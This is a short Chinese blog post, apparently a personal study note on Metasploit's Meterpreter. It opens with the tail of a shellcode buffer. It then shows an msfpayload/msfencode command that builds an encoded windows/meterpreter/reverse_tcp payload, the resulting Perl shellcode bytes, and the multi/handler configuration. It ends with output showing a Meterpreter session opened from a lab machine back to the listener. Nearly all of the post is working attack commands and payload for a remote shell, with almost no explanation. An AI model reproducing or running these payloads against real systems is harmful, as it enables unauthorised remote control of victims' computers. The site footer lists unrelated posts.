    "x37x50x54x52x33x51x44x50x32x50x50x52x4fx51" .
    "x42x50x4ax50x43x50x30x52x30x51x43x50x49x52" .
    "x4fx50x58x51x45x51x35x50x33x52x31x54x31x50" .
    "x50x52x4cx50x45x50x33x51x33x50x30x51x31x51" .
    "x31x41x41";
    


    meterpreter 使用  情况学习:

    root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.198.135 R | ./msfencode -b 'x00' -t perl -e x86/alpha_mixed
    [*] x86/alpha_mixed succeeded with size 642 (iteration=1)
    
    my $buf = 
    "x89xe6xdbxd8xd9x76xf4x58x50x59x49x49x49x49" .
    "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
    "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
    "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
    "x42x75x4ax49x49x6cx4bx58x4ex69x45x50x43x30" .
    "x47x70x43x50x4cx49x5ax45x50x31x4ex32x50x64" .
    "x4ex6bx51x42x50x30x4ex6bx50x52x56x6cx4cx4b" .··········
    用的IP和端口 是  监听电脑的端口。在被攻击电脑上运行shellcode   然后监听电脑得到meterpreter

    msf > use exploit/multi/handler 
    msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf  exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf  exploit(handler) > set LHOST 192.168.198.135
    LHOST => 192.168.198.135
    msf  exploit(handler) > show options 
    
    Module options (exploit/multi/handler):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique: seh, thread, process, none
       LHOST     192.168.198.135  yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Wildcard Target
    
    
    msf  exploit(handler) > exploit 
    
    [*] Started reverse handler on 192.168.198.135:4444 
    [*] Starting the payload handler...
    [*] Sending stage (752128 bytes) to 192.168.198.136
    [*] Meterpreter session 1 opened (192.168.198.135:4444 -> 192.168.198.136:3961) at 2014-06-02 23:09:44 +0800
    
    meterpreter > 
    















  • 相关阅读:
    touchMove VS touchCancel
    svg viewbox 作用
    reactjs reactLink
    放开linux下的端口
    运算符重载函数作为类成员函数和友元函数 (转)
    MBean和MXBean 区别
    transfer-encoding
    CSRF
    vue知识拓展
    居中
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982391.html
Copyright © 2020-2023  润新知